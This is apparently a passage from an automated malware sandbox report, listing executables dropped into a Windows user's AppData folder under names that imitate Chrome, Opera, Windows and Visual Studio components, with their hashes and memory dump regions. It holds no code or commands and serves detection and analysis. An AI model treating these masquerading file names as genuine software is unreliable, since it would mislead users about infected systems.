| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Temp\zhXaQqWy8P.exe
| MD5 | 6305d26e0d0da07bf2863c814880fd90 |
| SHA1 | 188e757b24db85262538bdc5ad27dc95ee6c79d6 |
| SHA256 | a643f81d20450ab0676df158f88f4a7fad7c2bfbedcf9cddfed850b2c5867677 |
| SHA512 | e8c9dd5aec0f30f80f978837b9336142e82b5dbbf1b393e3bd982967e80eebc27211f28d0ec18baafa733191828b3622c64246529b7c23c89edf9f0b8a4ff973 |
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
| MD5 | 112177b6405c9b96a95b4747ba9d4dbe |
| SHA1 | 724de53c31774aaba7a319f92d2c76399252a729 |
| SHA256 | 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4 |
| SHA512 | dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26 |
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
| MD5 | 112177b6405c9b96a95b4747ba9d4dbe |
| SHA1 | 724de53c31774aaba7a319f92d2c76399252a729 |
| SHA256 | 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4 |
| SHA512 | dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26 |
C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
| MD5 | 112177b6405c9b96a95b4747ba9d4dbe |
| SHA1 | 724de53c31774aaba7a319f92d2c76399252a729 |
| SHA256 | 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4 |
| SHA512 | dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26 |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
memory/5636-426-0x0000000000400000-0x0000000000412000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
memory/5860-518-0x0000000000400000-0x0000000000412000-memory.dmp
memory/2212-522-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
memory/5896-566-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-567-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-569-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-571-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-573-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-575-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-577-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-579-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-581-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-583-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-585-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-589-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-587-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-591-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-593-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-595-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-597-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-599-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-601-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-603-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-605-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-607-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-609-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-611-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-613-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-615-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-617-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-619-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-621-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-623-0x00000000060D0000-0x0000000006168000-memory.dmp
memory/5896-625-0x00000000060D0000-0x0000000006168000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab398d363668bc30f4c27715f46fb832 |
| SHA1 | 396bf16a41d5db28af8dd5966fbe7325737ac88f |
| SHA256 | 9d784bf4780ac38224bda1828d5bed32e9f01e18eeceb012a58b14d088ab6f55 |
| SHA512 | 410637d4c2ba3e70ddd3347a32f11321cf988cf484155986dcb5675f145ab8d522a1149a272efd2c0e2cd4548dc6695ea1584a073595202e9d5ab8b7a081345e |
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
| MD5 | 1f5315e49ee05ffc816a640c18f18507 |
| SHA1 | 21f0d367c32a084d68f3af16e2a3915ed9bca6a0 |
| SHA256 | d1c5aa5092330237c7f636e2b899957f0d1f8e82a87007c54e71d6efd98a4a5c |
| SHA512 | 75104ca8cc835ca89c29690e850e2316d43de25274fcd2db8c3b4af4651ea7f8e43e3b05ed4255e40efbad0f0904045c4bee7630c8d663b0bda998a3ff28c8a7 |